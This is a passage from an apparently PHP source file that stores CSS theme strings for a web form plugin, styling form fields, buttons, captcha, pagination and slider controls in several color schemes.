!important;\n}\n.wdform_colon\n{\ncolor:#ffffff\n}\n.wdform_separator\n{\nfont-style:bold !important;\nvertical-align:middle !important;\ncolor:#ffffff !important;\n}\n.wdform_line\n{\ncolor:#ffffff\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.am_pm_select\n{\nborder-radius:0px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #000000 !important;\ncolor:#fff !important;\nheight:20px !important;\n}\n.input_deactive\n{\ncolor:#C4CCE2 !important;\nfont-style:italic !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nborder-radius:0px !important;\nheight:16px;\nbackground-color: #000000 !important;\n}\n.input_active\n{\ncolor:#fff !important;\nfont-style:normal !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nborder-radius:0px !important;\nheight:16px;\nbackground-color: #000000 !important;\n}\n.required\n{\nborder:none !important;\ncolor:red\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_white.png) !important;\n}\n.captcha_input\n{\ncolor:#fff !important;\nborder: 1px solid #fff !important;\npadding:0px !important;\nmargin:0px !important;\nborder-radius:0px !important;\nheight:16px !important;\nbackground-color: #000000 !important;\n}\n.file_upload\n{\nborder-width:1px !important;\nmargin: 1px !important;\npadding: 1px !important;\ncolor:#fff !important;\n}    \n.page_deactive\n{\ncolor:#ffffff !important;\nborder:1px solid #ffffff !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nborder-radius: 0px !important;\nbackground-color:#000000 !important;\n}\n.page_active\n{\nfont-weight:bold !important;\ncolor:#ffffff !important;\nborder:1px solid #000 !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#fff !important;\nbackground-color:#C2C2C2 !important;\nborder-radius: 0px !important;\nbox-shadow: 0px 0px 5px 2px #000000 !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin-bottom: 0px !important;\nborder-spacing: 0px !important;\nheight:25px !important;\nline-height:25px !important;\nbackground-color:#C2C2C2 !important;\nborder-radius:0px !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: right !important; \nbox-shadow: 0px 0px 10px #ffffff !important;\n}\n.page_percentage_deactive\n{\nheight:25px !important;\nline-height:25px !important;\nbackground-color:#000000 !important;\nborder-radius:0px !important;\ntext-align: left !important; \npadding:2px !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#ffffff !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #000 !important;\nbackground-color:#C2C2C2 !important;\nborder: 1px solid #000 !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 0px #0078C9 !important;\n}\n.button_reset\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #000 !important;\nbackground-color:#C2C2C2 !important;\nborder: 1px solid #000 !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 0px #0078C9 !important;\n}\nbutton.wdform_page_button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #000 !important;\nbackground-color:#C2C2C2 !important;\nborder: 1px solid #000 !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 0px #0078C9 !important;\n}\nspan.wdform_page_button\n{\ncolor:#ffffff !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\ncolor: white !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.other_input\n{\nborder-radius:0px !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\nbackground-color: #000000 !important;\ncolor:#fff !important;\nmargin-left: 25px !important;\n}\n.wdform_button button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #000 !important;\nbackground-color:#C2C2C2 !important;\nborder: 1px solid #000 !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 0px #0078C9 !important;\n}\n.wdform_page_navigation\n{\ntext-align:center !important;\nheight:38px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#ffffff !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#ffffff !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 30px !important;\n}\n.wdform_map>div\n{\nborder:4px solid #fff !important;\nborder-radius:1px !important;\n}\n.wdform_scale_rating table input\r\n{\r\nmargin:0 2px;\r\n}\r\n\r\n.wdform_scale_rating span\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_grading .grading_div\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_grading input\r\n{\r\nmargin:0 0 3px;\r\ncolor:#FFFFFF;\r\nbackground-color:#000000;\r\npadding:0 4px;\r\nborder:1px solid #FFFFFF;\r\n}\r\n\r\n.ui-slider-handle:hover, .ui-slider-handle:focus\r\n{\r\nbackground:#C2C2C2 !important;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-slider-handle, .ui-slider-range{\r\nbackground:#C2C2C2;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-slider\r\n{\r\nborder:1px solid #FFFFFF;\r\nborder-radius:0px !important;\r\nbackground:none;\r\n}\r\n\r\n\r\n.ui-spinner-button:hover\r\n{\r\nbackground:#C2C2C2;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-icon\r\n{\r\ncolor:#C2C2C2;\r\n}\r\n\r\n.ui-icon:hover\r\n{\r\ncolor:#000000;\r\n}\r\n\r\n.ui-spinner-input\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.ui-spinner\r\n{\r\nborder:1px solid #FFFFFF;\r\nmargin-right:3px !important;\r\nborder-radius:0px !important;\r\nbackground:none;\r\n}\r\n\r\n.ui-spinner-button\r\n{\r\nborder-left:1px solid #FFFFFF;\r\nborder-radius:0px;\r\n}\r\n\r\n.ui-spinner-input:focus\r\n{\r\noutline: none;\r\nborder:none !important;\r\n}\r\n\r\n.matrix_ \r\n{\r\npadding:4px 0;\r\nbackground:none;\r\n}\r\n\r\n.matrix_ label\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_matrix table\r\n{\r\nborder-collapse: separate !important;\r\n}\r\n\r\n.wdform_matrix table td\r\n{\r\nborder:1px solid #FFFFFF;\r\n}\r\n\r\n.wdform_matrix table tr:first-child td:first-child\r\n{\r\nborder:none;\r\n}\r\n\r\n.wdform_matrix table input, .wdform_matrix table select\r\n{\r\ncolor:#FFFFFF;\r\nbackground-color:#000000;\r\nborder:1px solid #000000;\r\nmargin:5px 7px;\r\npadding:1px;\r\n}\r\n\r\n.wdform_paypal_total\r\n{\r\ncolor:#ffffff;\r\n}",
      "22" => ".page_numbers {\nmargin-left: 10px;\n}\n .page_percentage_deactive,.page_percentage_deactive * {\nword-wrap: normal !important;\n-moz-box-sizing: content-box !important;\n-webkit-box-sizing: content-box !important;\nbox-sizing: content-box !important;\n}\n .wdform_td1 input {\n-webkit-box-sizing: content-box;\n-moz-box-sizing: content-box;\nbox-sizing: content-box;\n}\ntable {\n font-size: 12px !important;\n}\n.wdform_table1 table, .wdform_table1 tr, .wdform_table1 th{\n	border:none !important;\n	padding-top:inherit !important;\n	padding-bottom:inherit !important;\n	margin:inherit !important;\n	line-height:1 !important;\n}\n.wdform_table1 img{\n	max-width:inherit !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.wdform_table2 table, .wdform_table2 tr, .wdform_table2 th{\n	width:inherit !important;\n	vertical-align:top !important;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.toolbar_padding hr{\n	margin-bottom:7px !important;\n	margin-top:7px !important;\n}\n.wdform_table1 td{\n	line-height:1 !important;\n	border:inherit !important;\n	padding-bottom:2px;\n	padding-top:2px;\n	padding-left:inherit !important;\n	padding-right:inherit !important;\n	vertical-align:middle;\n	text-align:left;\n	margin:inherit !important;\n}\n.wdform_table2 td{\n	line-height:1 !important;\n	border:inherit !important;\n	padding-bottom:2px;\n	padding-top:2px;\n	padding-left:inherit !important;\n	padding-right:inherit !important;\n	vertical-align:top !important;\n	margin:inherit !important;\n	text-align:left;\n}\n.wdform_table1 span{\n	vertical-align:top !important;\n}\n.label{\n	font-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\n	color:#ffffff !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1 input, .wdform_table1 textara{\n		-webkit-transition: all 0.0s linear;\n		line-height:1 !important;\n		font-size:inherit !important; \n		display:inline !important;\n		margin-top:inherit !important;\n		margin-bottom:inherit !important;\n		padding-top:inherit ;\n		padding-bottom:inherit;\n}\n.wdform_table1 select{\n	margin-bottom:inherit !important;\n	margin-top:inherit !important;\n	line-height:1 !important;\n		font-size:inherit !important; \n		height:inherit !important;\n		display:inline !important;\n}\n.wdform_table1 button{\n	background-image:inherit !important;\n	padding:inherit !important;\n	line-height:1 !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nborder-spacing: 0px !important;\nborder: 0px solid black !important;\nwidth:100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#702400 !important;\ntext-align:center !important;\nborder-radius:0px !important;\nfloat:left !important;\nwidth:100% !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n}\n.wdform_td1\n{\n}\n.wdform_table2\n{\npadding-right:30px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 0px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\nbackground-color:#FFD79C !important;\n}\n.wdform_tr_section_break\n{\ndisplay: table !important;\nwidth: 100% !important;\n}\n.wdform_select\n{\nborder-radius:0px !important;\n}\n.wdform_input input\n{\nborder-radius:0px !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\nbackground-color: #702400 !important;\ncolor:#fff !important;\n}\n.wdform_date_fields input\n{\nborder-radius:0px !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\nbackground-color: #702400 !important;\ncolor:#fff !important;\n}\n.wdform_date_fields select\n{\nborder-radius:0px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #702400 !important;\ncolor:#fff !important;\nheight:20px !important;\n}\n.wdform_select select\n{\nborder-radius:0px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #702400 !important;\ncolor:#fff !important;\nheight:20px !important;\n}\n.wdform_address input\n{\nborder-radius:0px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #702400 !important;\ncolor:#fff !important;\n}\n.wdform_date\n{\nborder-radius:0px !important;\nheight:16px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #702400 !important;\ncolor:#fff !important;\n}\n.wdform_address select\n{\nborder-radius:0px !important;\nheight:20px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #702400 !important;\ncolor:#fff !important;\n}\n.time_box\n{\nborder-radius:0px !important;\nheight:16px !important;\npadding:1px !important;\nmargin:1px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle !important;\nborder: 1px solid #fff !important;\nbackground-color: #702400 !important;\ncolor:#fff !important;\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#ffffff\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#ffffff !important;\n}\n.label\n{\nborder:none !important;\ncolor:#ffffff !important;\n}\n.wdform_colon\n{\ncolor:#ffffff\n}\n.wdform_separator\n{\nfont-style:bold !important;\nvertical-align:middle !important;\ncolor:#ffffff !important;\n}\n.wdform_line\n{\ncolor:#ffffff\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.am_pm_select\n{\nborder-radius:0px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #702400 !important;\ncolor:#fff !important;\nheight:20px !important;\n}\n.input_deactive\n{\ncolor:#C4CCE2 !important;\nfont-style:italic !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nborder-radius:0px !important;\nheight:16px;\nbackground-color: #702400 !important;\n}\n.input_active\n{\ncolor:#fff !important;\nfont-style:normal !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nborder-radius:0px !important;\nheight:16px;\nbackground-color: #702400 !important;\n}\n.required\n{\nborder:none !important;\ncolor:red\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_white.png) !important;\n}\n.captcha_input\n{\ncolor:#fff !important;\nborder: 1px solid #fff !important;\npadding:0px !important;\nmargin:0px !important;\nborder-radius:0px !important;\nheight:16px !important;\nbackground-color: #702400 !important;\n}\n.file_upload\n{\nborder-width:1px !important;\nmargin: 1px !important;\npadding: 1px !important;\ncolor:#fff !important;\n}    \n.page_deactive\n{\ncolor:#ffffff !important;\nborder:1px solid #ffffff !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nborder-radius: 0px !important;\nbackground-color:#702400 !important;\n}\n.page_active\n{\nfont-weight:bold !important;\ncolor:#000 !important;\nborder:1px solid #000 !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#FFD79C !important;\nborder-radius: 0px !important;\nbox-shadow: 0px 0px 5px 2px #702400 !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin-bottom: 0px !important;\nborder-spacing: 0px !important;\nheight:25px !important;\nline-height:25px !important;\nbackground-color:#FFD79C !important;\nborder-radius:0px !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: right !important; \nbox-shadow: 0px 0px 10px #ffffff !important;\n}\n.page_percentage_deactive\n{\nheight:25px !important;\nline-height:25px !important;\nbackground-color:#702400 !important;\nborder-radius:0px !important;\ntext-align: left !important; \npadding:2px !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#ffffff !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #000 !important;\nbackground-color:#FFD79C !important;\nborder: 1px solid #000 !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000 !important;\n}\n.button_reset\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor:  #000 !important;\nbackground-color:#FFD79C !important;\nborder: 1px solid #000 !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000 !important;\n}\nbutton.wdform_page_button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor:  #000 !important;\nbackground-color:#FFD79C !important;\nborder: 1px solid #000 !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000 !important;\n}\nspan.wdform_page_button\n{\ncolor:#ffffff !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\ncolor: white !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.other_input\n{\nborder-radius:0px !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\nbackground-color: #702400 !important;\ncolor:#fff !important;\nmargin-left: 25px !important;\n}\n.wdform_button button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor:  #000 !important;\nbackground-color:#FFD79C !important;\nborder: 1px solid #000 !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000 !important;\n}\n.wdform_page_navigation\n{\ntext-align:center !important;\nheight:38px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#000 !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#ffffff !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 30px !important;\n}\n.wdform_map>div\n{\nborder:4px solid #fff !important;\nborder-radius:1px !important;\n}\n.wdform_scale_rating table input\r\n{\r\nmargin:0 2px;\r\n}\r\n\r\n.wdform_scale_rating span\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_grading .grading_div\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_grading input\r\n{\r\nmargin:0 0 3px;\r\ncolor:#FFFFFF;\r\nbackground-color:#702400;\r\nborder:1px solid #FFFFFF;\r\npadding: 0 4px;\r\n}\r\n\r\n\r\n.ui-slider-handle:hover, .ui-slider-handle:focus\r\n{\r\nbackground:#FFFFFF !important;\r\nborder-radius:0px !important;\r\noutline:none;\r\n}\r\n\r\n.ui-slider-handle, .ui-slider-range{\r\nbackground:#FFFFFF;\r\nborder-radius:0px !important;\r\n}\r\n\r\n\r\n.ui-slider\r\n{\r\nborder:1px solid #FFFFFF;\r\nborder-radius:0px !important;\r\nbackground:none;\r\n}\r\n\r\n\r\n.ui-spinner-button:hover\r\n{\r\nbackground:#FFFFFF;\r\n}\r\n\r\n.ui-icon\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.ui-icon:hover\r\n{\r\ncolor:#702400;\r\n}\r\n\r\n.ui-spinner-input\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.ui-spinner\r\n{\r\nborder:1px solid #FFFFFF;\r\nmargin-right:3px !important;\r\nborder-radius:0px !important;\r\nbackground:none;\r\n}\r\n\r\n.ui-spinner-button\r\n{\r\nborder-left:1px solid #FFFFFF;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-spinner-input:focus\r\n{\r\noutline: none;\r\nborder:none !important;\r\n}\r\n\r\n.matrix_ \r\n{\r\npadding:4px 0;\r\nbackground:none;\r\n}\r\n\r\n.matrix_ label\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_matrix table\r\n{\r\nborder-collapse: separate !important;\r\n\r\n}\r\n\r\n.wdform_matrix table td\r\n{\r\nborder:1px solid #FFFFFF;\r\n\r\n}\r\n\r\n.wdform_matrix table tr:first-child td:first-child\r\n{\r\nborder:none;\r\n}\r\n\r\n.wdform_matrix table input, .wdform_matrix table select\r\n{\r\ncolor:#FFFFFF;\r\nbackground-color:#702400;\r\nborder:none;\r\nmargin:5px 7px;\r\n}\r\n\r\n.wdform_paypal_total\r\n{\r\ncolor:#ffffff;\r\n}",
      "23" => ".page_numbers {\nmargin-left: 10px;\n}\n .page_percentage_deactive,.page_percentage_deactive * {\nword-wrap: normal !important;\n-moz-box-sizing: content-box !important;\n-webkit-box-sizing: content-box !important;\nbox-sizing: content-box !important;\n}\n .wdform_td1 input {\n-webkit-box-sizing: content-box;\n-moz-box-sizing: content-box;\nbox-sizing: content-box;\n}\ntable {\n font-size: 12px !important;\n}\n.wdform_table1 table, .wdform_table1 tr, .wdform_table1 th{\n	border:none !important;\n	padding-top:inherit !important;\n	padding-bottom:inherit !important;\n	margin:inherit !important;\n	line-height:1 !important;\n}\n.wdform_table1 img{\n	max-width:inherit !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.wdform_table2 table, .wdform_table2 tr, .wdform_table2 th{\n	width:inherit !important;\n	vertical-align:top !important;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.toolbar_padding hr{\n	margin-bottom:7px !important;\n	margin-top:7px !important;\n}\n.wdform_table1 td{\n	line-height:1 !important;\n	border:inherit !important;\n	padding-bottom:2px;\n	padding-top:2px;\n	padding-left:inherit !important;\n	padding-right:inherit !important;\n	vertical-align:middle;\n	text-align:left;\n	margin:inherit !important;\n}\n.wdform_table2 td{\n	line-height:1 !important;\n	border:inherit !important;\n	padding-bottom:2px;\n	padding-top:2px;\n	padding-left:inherit !important;\n	padding-right:inherit !important;\n	vertical-align:top !important;\n	margin:inherit !important;\n	text-align:left;\n}\n.wdform_table1 span{\n	vertical-align:top !important;\n}\n.label{\n	font-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\n	color:#ffffff !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1 input, .wdform_table1 textara{\n		-webkit-transition: all 0.0s linear;\n		line-height:1 !important;\n		font-size:inherit !important; \n		display:inline !important;\n		margin-top:inherit !important;\n		margin-bottom:inherit !important;\n		padding-top:inherit ;\n		padding-bottom:inherit;\n}\n.wdform_table1 select{\n	margin-bottom:inherit !important;\n	margin-top:inherit !important;\n	line-height:1 !important;\n		font-size:inherit !important; \n		height:inherit !important;\n		display:inline !important;\n}\n.wdform_table1 button{\n	background-image:inherit !important;\n	padding:inherit !important;\n	line-height:1 !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nborder-spacing: 0px !important;\nborder: 0px solid black !important;\nwidth:100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#C91B24 !important;\ntext-align:center !important;\nborder-radius:0px !important;\nfloat:left !important;\nwidth:100% !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n}\n.wdform_td1\n{\n}\n.wdform_table2\n{\npadding-right:30px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 0px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\nbackground-color:#000000 !important;\n}\n.wdform_tr_section_break\n{\ndisplay: table !important;\nwidth: 100% !important;\n}\n.wdform_select\n{\nborder-radius:0px !important;\n}\n.wdform_input input\n{\nborder-radius:0px !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\nbackground-color: #C91B24 !important;\ncolor:#fff !important;\n}\n.wdform_date_fields input\n{\nborder-radius:0px !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\nbackground-color: #C91B24 !important;\ncolor:#fff !important;\n}\n.wdform_date_fields select\n{\nborder-radius:0px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #C91B24 !important;\ncolor:#fff !important;\nheight:20px !important;\n}\n.wdform_select select\n{\nborder-radius:0px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #C91B24 !important;\ncolor:#fff !important;\nheight:20px !important;\n}\n.wdform_address input\n{\nborder-radius:0px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #C91B24 !important;\ncolor:#fff !important;\n}\n.wdform_date\n{\nborder-radius:0px !important;\nheight:16px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #C91B24 !important;\ncolor:#fff !important;\n}\n.wdform_address select\n{\nborder-radius:0px !important;\nheight:20px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #C91B24 !important;\ncolor:#fff !important;\n}\n.time_box\n{\nborder-radius:0px !important;\nheight:16px !important;\npadding:1px !important;\nmargin:1px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle !important;\nborder: 1px solid #fff !important;\nbackground-color: #C91B24 !important;\ncolor:#fff !important;\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#ffffff\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#ffffff !important;\n}\n.label\n{\nborder:none !important;\ncolor:#ffffff !important;\n}\n.wdform_colon\n{\ncolor:#ffffff\n}\n.wdform_separator\n{\nfont-style:bold !important;\nvertical-align:middle !important;\ncolor:#ffffff !important;\n}\n.wdform_line\n{\ncolor:#ffffff\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.am_pm_select\n{\nborder-radius:0px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #C91B24 !important;\ncolor:#fff !important;\nheight:20px !important;\n}\n.input_deactive\n{\ncolor:#C4CCE2 !important;\nfont-style:italic !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nborder-radius:0px !important;\nheight:16px;\nbackground-color: #C91B24 !important;\n}\n.input_active\n{\ncolor:#fff !important;\nfont-style:normal !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nborder-radius:0px !important;\nheight:16px;\nbackground-color: #C91B24 !important;\n}\n.required\n{\nborder:none !important;\ncolor:blue\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_white.png) !important;\n}\n.captcha_input\n{\ncolor:#fff !important;\nborder: 1px solid #fff !important;\npadding:0px !important;\nmargin:0px !important;\nborder-radius:0px !important;\nheight:16px !important;\nbackground-color: #C91B24 !important;\n}\n.file_upload\n{\nborder-width:1px !important;\nmargin: 1px !important;\npadding: 1px !important;\ncolor:#fff !important;\n}    \n.page_deactive\n{\ncolor:#ffffff !important;\nborder:1px solid #ffffff !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nborder-radius: 0px !important;\nbackground-color:#C91B24 !important;\n}\n.page_active\n{\nfont-weight:bold !important;\ncolor:#ffffff !important;\nborder:1px solid #000 !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#000000 !important;\nborder-radius: 0px !important;\nbox-shadow: 0px 0px 5px 2px #C91B24 !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin-bottom: 0px !important;\nborder-spacing: 0px !important;\nheight:25px !important;\nline-height:25px !important;\nbackground-color:#000000 !important;\nborder-radius:0px !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: right !important; \nbox-shadow: 0px 0px 10px #ffffff !important;\n}\n.page_percentage_deactive\n{\nheight:25px !important;\nline-height:25px !important;\nbackground-color:#C91B24 !important;\nborder-radius:0px !important;\ntext-align: left !important; \npadding:2px !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#ffffff !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #fff !important;\nbackground-color:#000000 !important;\nborder: 1px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000 !important;\n}\n.button_reset\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor:  #fff !important;\nbackground-color:#000000 !important;\nborder: 1px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000 !important;\n}\nbutton.wdform_page_button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor:  #fff !important;\nbackground-color:#000000 !important;\nborder: 1px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000 !important;\n}\nspan.wdform_page_button\n{\ncolor:#ffffff !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\ncolor: white !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.other_input\n{\nborder-radius:0px !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px 